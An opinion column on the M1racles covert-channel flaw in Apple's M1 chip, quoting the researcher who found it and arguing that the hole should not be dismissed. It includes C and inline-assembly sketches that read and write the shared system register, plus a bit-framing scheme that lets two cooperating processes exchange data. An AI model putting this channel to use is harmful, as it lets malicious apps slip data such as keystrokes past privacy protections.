When is a cybersecurity hole not a hole? Never

In cybersecurity, one of the more challenging decisions is when a security hole is a big deal requiring an immediate fix or workaround, and when it is small enough to be ignored or at least deferred. The tricky part is that much of this comes down to security by obscurity, where a vulnerability is left in place in the hope that no one stumbles on it. (Classic example: leaving a sensitive web page unprotected, but hoping that its long, non-intuitive URL isn't accidentally discovered.)

And then there’s the real problem: in the hands of a creative and well-resourced bad guy, almost any hole can be exploited in non-traditional ways. But, and there is always a “but” in cybersecurity, IT and security professionals cannot practically fix every single hole in the environment.

Like I said, it’s difficult.

It brings to mind an intriguing M1 CPU hole found by developer Hector Martin, who dubbed it M1racles and posted detailed thoughts about it.

Martin described it as “a flaw in the design of the Apple Silicon M1 chip [that] allows any two applications running under an OS to covertly exchange data between them, without using memory, sockets, files, or any other normal operating system features. This works between processes running as different users and under different privilege levels, creating a covert channel for surreptitious data exchange. The vulnerability is baked into Apple Silicon chips and cannot be fixed without a new silicon revision.”
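Based on Martin’s write-up, the channel is a small ARM system register (s3_5_c15_c10_1) with two usable bits that any userspace process can read and write. A minimal sketch of the primitive, assuming a clang toolchain on an M1 Mac (the helper names here are mine, not Martin’s):

    #include <stdint.h>
    #include <stdio.h>

    /* Read the two implemented bits (0 and 1) of the s3_5_c15_c10_1
     * system register, which Martin shows is accessible from EL0. */
    static inline uint64_t read_channel(void) {
        uint64_t v;
        __asm__ volatile("mrs %0, s3_5_c15_c10_1" : "=r"(v));
        return v & 3;
    }

    /* Write the two bits; any process running on the same core cluster
     * can observe the new value, regardless of user or privilege level. */
    static inline void write_channel(uint64_t v) {
        __asm__ volatile("msr s3_5_c15_c10_1, %0" : : "r"(v & 3));
    }

    int main(void) {
        write_channel(2); /* set bit 1 */
        printf("register reads: %llu\n", (unsigned long long)read_channel());
        return 0;
    }

No special entitlements, shared memory, or OS mediation is involved; that is what makes it a covert channel rather than an ordinary IPC mechanism.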

Martin said: “The only mitigation available to users is to run your entire OS as a VM. Yes, running your entire OS as a VM does have a performance impact,” and then suggested that, because of the performance hit, users won’t do that.

Here’s where things get interesting. Martin argues that, as a practical matter, this is not a problem.

“Really, nobody’s going to actually find a nefarious use for this flaw in practical circumstances. Besides, there are already a million side channels you can use for cooperative cross-process communication (e.g., cache stuff) on every system. Covert channels can’t leak data from uncooperative apps or systems. Actually, that one’s worth repeating: Covert channels are completely useless unless your system is already compromised.”

Martin initially said that the flaw could be easily mitigated, but he later changed his tune: “Originally I thought the register was per-core. If it were, then you could just wipe it on context switches. But since it’s per-cluster, sadly, we’re kind of screwed, since you can do cross-core communication without going into the kernel. Other than running in EL1/0 with TGE=0 (i.e., inside a VM guest), there is no known way to block it.”
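To make the ruled-out fix concrete: if the register were per-core, an OS could simply zero it on every task switch. A hypothetical sketch of that idea (my illustration of Martin’s point, not actual XNU code):

    /* Hypothetical mitigation, for illustration only: a kernel could
     * clear the register from its context-switch path. */
    static inline void clear_covert_register(void) {
        /* xzr is the always-zero register; this writes 0 to both bits. */
        __asm__ volatile("msr s3_5_c15_c10_1, xzr");
    }

    /* Because the real register is shared across a whole core cluster,
     * a process on a sibling core can still read and write it between
     * two switches on this core, which is why Martin concludes the
     * approach fails without trapping every access (TGE=0 in a VM). */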

Before anyone relaxes, consider Martin’s thoughts on iOS: “iOS is affected, like all other OSes. There are unique privacy implications to this vulnerability on iOS, as it could be used to bypass some of its stricter privacy protections. For example, keyboard apps are not allowed to access the internet, for privacy reasons. A malicious keyboard app could use this vulnerability to send text that the user types to another malicious app, which could then send it to the internet. However, since iOS apps distributed through the App Store are not allowed to build code at runtime (JIT), Apple can automatically scan them at submission time and reliably detect any attempts to exploit this vulnerability using static analysis (which they already use). We do not have further information on whether Apple plans to deploy these checks, or whether they have already done so, but they are aware of the issue and it would be reasonable to expect that they will. It is even possible that the existing automated analysis already rejects any attempts to use system registers directly.”
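To see why two cooperating apps are enough, here is one hypothetical way to frame data over a two-bit register: use one bit as data and the other as a clock the sender toggles. This framing is my own illustration, assumes both processes run on the same core cluster, and may differ from Martin’s actual proof of concept; it reuses the read_channel()/write_channel() helpers sketched earlier:

    #include <stdint.h>

    extern uint64_t read_channel(void);    /* helpers from the earlier sketch */
    extern void write_channel(uint64_t v);

    /* Bit 0 carries data; bit 1 is a clock that flips on every send,
     * so the receiver knows a fresh bit has arrived. */
    void send_bit(int bit) {
        static uint64_t clock = 0;
        clock ^= 1;
        write_channel((uint64_t)(bit & 1) | (clock << 1));
    }

    int recv_bit(void) {
        static uint64_t last_clock = 0;
        uint64_t v;
        do {                               /* spin until the clock flips */
            v = read_channel();
        } while (((v >> 1) & 1) == last_clock);
        last_clock = (v >> 1) & 1;
        return (int)(v & 1);
    }

Eight calls to send_bit() move a byte. No memory, sockets, or files are touched, which is exactly why OS-level controls such as the keyboard app’s network ban never see the transfer.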

This is where I start to worry. The security mechanism here is relying on Apple’s App Store reviewers to catch apps that try to take advantage of the flaw. Really? Neither Apple, nor Google with Android for that matter, has the resources to properly test every submitted app. As long as an app looks fine at a glance, an area where the professional bad guys excel, both mobile giants might well approve it.

In an otherwise excellent piece, Ars Technica said: “The covert channel could circumvent this protection by passing the key presses to another malicious app, which in turn would send them over the Internet. Even then, the chances that two apps would pass Apple’s review process and then get installed on a victim’s device are far-fetched.”

Far-fetched? Really? IT is supposed to trust that this hole will do no harm because the odds are against an attacker successfully taking advantage of it, which in turn rests on Apple’s review team catching any problematic apps? That is pretty scary logic.

This brings us back to my original point. What’s the best way to deal with holes that require a lot of work and a lot of luck to exploit? Given that no enterprise has the resources to properly address every single system hole, what’s an overworked, understaffed CISO team to do?

Still, it’s refreshing to see a developer find a hole and then play it down as no big deal. But now that the hole has effectively been made public, my money is on some cyberthief or ransomware extortionist figuring out a way to use it. I’d give them less than a month to take advantage of it.

The pressure needs to be on Apple to fix this ASAP.

Copyright © 2021 IDG Communications, Inc.
